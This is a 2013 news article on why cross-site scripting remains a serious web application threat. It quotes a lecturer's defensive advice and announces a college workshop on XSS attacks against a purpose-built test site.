XSS hack attacks still represent a serious threat to web apps

16 Aug 2013

Cross-site scripting (XSS) attacks remain one of the most serious threats to web applications, a senior lecturer at the School of Computing at the National College of Ireland told Siliconrepublic.com.

Along with SQL injection and cross-site request forgery, cross-site scripting accounts for 40pc of overall vulnerability disclosures in 2012, according to the Open Source Vulnerability Database (OSVD).

According to the HP 2012 Cyber Risk report: “In one case, analysis of a multinational corporation showed that just under half (48.32pc) of their web applications were vulnerable to some form of XSS.”

Michael Bradford, a lecturer at the School of Computing at the National College of Ireland, said the vulnerabilities in OSVDB disclosed by type by quarter statistics indicate that the number of disclosures relating to XSS has decreased in the period 2012-present.

“However, XSS disclosures still outrank disclosures relating to other types of vulnerability.”

Bradford said that there are a number of ways to defend against XSS attacks.

“Most of the main browsers have attempted to implement protection against XSS attacks – so this should offer some protection (unless the newly implemented functionality in the browser becomes susceptible to attack itself).

“Security should also be at the forefront of considerations during the application development process with secure coding practices employed. To prevent stealing of session cookie information, HttpOnly cookies should be used. It is also critical to examine and validate end-user data submitted to web applications.

“If an application accepts HTML tagged content as input this should be seriously examined. As a rule, all input should be HTML-encoded unless absolutely necessary; and in those exceptional cases great care should be taken to validate the data as being non-malicious in nature,” Bradford said.

Dot Conf deep dive on XSS attacks

On Thursday, 29 August, the National College of Ireland will hold a deep dive session as part of its Dot Conf series focused on XSS hack attacks.

The workshop will look at the key characteristics of an XSS attack, the different types of XSS attack vulnerabilities and measures that can be put in place to mitigate the threat of a web app being susceptible to XSS attacks.

“The workshop will give an overview and describe a number of types of XSS attack vectors. We would also like the attendees to attempt to implement these various XSS attacks against a test website that we have set up.

“This test website has been deployed without implementing any protections against XSS attacks. We plan to end with a Q&A session relating to XSS and web application security,” Bradford added.

Hacker attack image via Shutterstock

John Kennedy is a journalist who served as editor of Silicon Republic for 17 years

editorial@siliconrepublic.com